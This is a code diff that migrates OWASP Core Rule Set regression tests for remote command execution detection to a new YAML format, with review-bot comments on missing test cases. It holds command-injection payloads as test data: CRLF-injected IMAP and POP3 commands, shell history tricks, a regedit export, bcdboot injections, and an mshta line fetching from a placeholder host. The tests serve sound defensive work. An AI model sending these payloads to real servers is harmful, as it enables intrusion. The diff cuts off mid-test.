"/post" - data: | - textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 10 desc: "IMAP SEARCH with CHARSET Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 11 desc: "IMAP SEARCH using TEXT Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - 
test_id: 12 desc: "IMAP SEARCH using CHARSET and range Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 13 desc: "IMAP SEARCH Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. - version: HTTP/1.0 - output: - no_log_contains: id "932311" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml index 34be803b8..248e5e706 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml 
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml 
@@ -2,192 +2,191 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: POP3 Command Injection test cases" - enabled: true - name: 932320.yaml +rule_id: 932320 tests: - - test_title: 932320-1 + - test_id: 1 desc: "POP3 RETR/DELE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRETR%20123" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRETR%20123" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 2 desc: "POP3 RETR Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 3 desc: "POP3 DELE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=We%20should%20delete%20nine - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + 
textarea=We%20should%20delete%20nine + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 4 desc: "POP3 LIST Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0alist%203" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0alist%203" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 5 desc: "POP3 LIST Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=This%20text%20is%20a%20way%20of%20list%203%20things - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=This%20text%20is%20a%20way%20of%20list%203%20things + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 6 desc: "POP3 TOP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aTOP%201%202" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aTOP%201%202" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 7 desc: 
"POP3 TOP Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=These%20are%20top%10%20rules - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=These%20are%20top%10%20rules + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 8 desc: "POP3 AUTH Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 9 desc: "POP3 AUTH Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! 
+ version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 10 desc: "POP3 APOP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 11 desc: "POP3 APOP Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Look%2C%20apop%20star! - version: HTTP/1.0 - output: - no_log_contains: id "932320" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Look%2C%20apop%20star! + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml index e8f786a99..81edbfea9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml 
@@ -2,108 +2,107 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: POP3 PL3 Command Injection test cases" - enabled: true - name: 932321.yaml +rule_id: 932321 tests: - - test_title: 932321-1 + - test_id: 1 desc: "POP3 QUIT/STAT/NOOP/RSET/CAPA Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aQUIT" - version: HTTP/1.0 - output: - log_contains: id "932321" - - test_title: 932321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aQUIT" + version: HTTP/1.0 + output: + log: + expect_ids: [932321] + - test_id: 2 desc: "POP3 QUIT Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Don't%20quit" - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Don't%20quit" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] + - test_id: 3 desc: "POP3 CAPA Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=we%20do%20not%20have%20that%20capability - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + 
textarea=we%20do%20not%20have%20that%20capability + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] + - test_id: 4 desc: "POP3 STAT Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hi%20lestat! - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hi%20lestat! + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] + - test_id: 5 desc: "POP3 NOOP Command injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0aSeriously%2C%20noop" - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0aSeriously%2C%20noop" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] + - test_id: 6 desc: "POP3 RSET Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Someone%20bought%20this%20nice%20lerset - version: HTTP/1.0 - output: - no_log_contains: id "932321" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Someone%20bought%20this%20nice%20lerset + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] 
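Review bot: Positive coverage in this file is narrower than test 1's description claims: `desc: "POP3 QUIT/STAT/NOOP/RSET/CAPA Command injection positive test"` sends only `%0d%0aQUIT`, while tests 2 through 6 are all `no_expect_ids` cases, so STAT, NOOP, RSET and CAPA are never exercised as injected commands. Either narrow the label to `desc: "POP3 QUIT Command injection positive test"` or add one `expect_ids: [932321]` stage per remaining command so a regression in the rule's handling of those verbs is caught by this suite. This hunk is a format migration, so it reads as a follow-up rather than a blocker.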
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml index f3c86c781..fb3b2d645 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml @@ -2,22 +2,21 @@ meta: author: "karelorigin, azurit" description: "Remote Command Execution: Unix shell history invocation" - enabled: true - name: 932330.yaml +rule_id: 932330 tests: - - test_title: 932330-1 + - test_id: 1 desc: "Unix shell history invocation: relative position" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!-1!-2" - version: HTTP/1.0 - output: - log_contains: id "932330" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!-1!-2" + version: HTTP/1.0 + output: + log: + expect_ids: [932330] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml index 4b8b11c2a..f147a23d5 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml 
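Review bot: After the migration 932330 still consists of a single positive stage with no true-negative case, and the 932331 hunk that follows has the same shape (two positives, no negative). Without at least one `no_expect_ids: [932330]` stage carrying ordinary text that contains `!` without a history reference, a later tightening or loosening of the rule's pattern would only be caught in the positive direction. A short benign-text GET modelled on the existing stage would close that gap in both files.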
@@ -2,38 +2,37 @@ meta: author: "karelorigin, azurit" description: "Remote Command Execution: Unix shell history invocation" - enabled: true - name: 932331.yaml +rule_id: 932331 tests: - - test_title: 932331-1 + - test_id: 1 desc: "Unix shell history invocation: absolute position" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!1" - version: HTTP/1.0 - output: - log_contains: id "932331" - - test_title: 932331-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!1" + version: HTTP/1.0 + output: + log: + expect_ids: [932331] + - test_id: 2 desc: "Unix shell history invocation: last command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!!" - version: HTTP/1.0 - output: - log_contains: id "932331" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!!" + version: HTTP/1.0 + output: + log: + expect_ids: [932331] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml index 5b3ca8ddf..422afebd9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml 
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml 
@@ -2,75 +2,74 @@ meta: author: "airween, Franziska Bühler, azurit" description: "Remote Command Execution: Windows Command Injection test cases" - enabled: true - name: 932370.yaml +rule_id: 932370 tests: - - test_title: 932370-1 + - test_id: 1 desc: "Windows Command Injection true positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey" - uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" - version: HTTP/1.0 - output: - log_contains: id "932370" - - test_title: 932370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey" + uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" + version: HTTP/1.0 + output: + log: + expect_ids: [932370] + - test_id: 2 desc: "Windows Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=regedit " - uri: "/get?cmd=regedit%20" - version: HTTP/1.0 - output: - no_log_contains: id "932370" - - test_title: 932370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + method: GET + port: 80 + # "cmd=regedit " + uri: "/get?cmd=regedit%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932370] + - test_id: 3 desc: "Windows Command Injection - bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=; mshta http://example.com" - uri: "/get?cmd=;%20mshta%20http://example.com" - version: HTTP/1.0 - output: - log_contains: id "932370" - - test_title: 932370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=; mshta http://example.com" + uri: "/get?cmd=;%20mshta%20http://example.com" + version: HTTP/1.0 + output: + log: + expect_ids: [932370] + - test_id: 4 desc: Windows Command Injection bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: id "932370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932370] 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml index 5e5f82e1b..8e4ad88c2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml 
@@ -2,175 +2,174 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: Windows shell command injections - enabled: true - name: 932380.yaml +rule_id: 932380 tests: - - test_title: 932380-1 + - test_id: 1 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot < file.txt Match input redirection to bcdboot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 2 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt Match bcdboot with normal argument stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 3 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot/r file.txt Match bcdboot with argument without preceding space stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 4 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt Match bcdboot with argument with multiple preceding space stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" + 
version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 5 desc: | Windows shell command injection with 'sort' (false positive): sort%3Dex%26sort%3Dascending Do not match query parameter stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" - version: HTTP/1.0 - output: - no_log_contains: id "932380" - - test_title: 932380-6 + - input: + dest_addr: 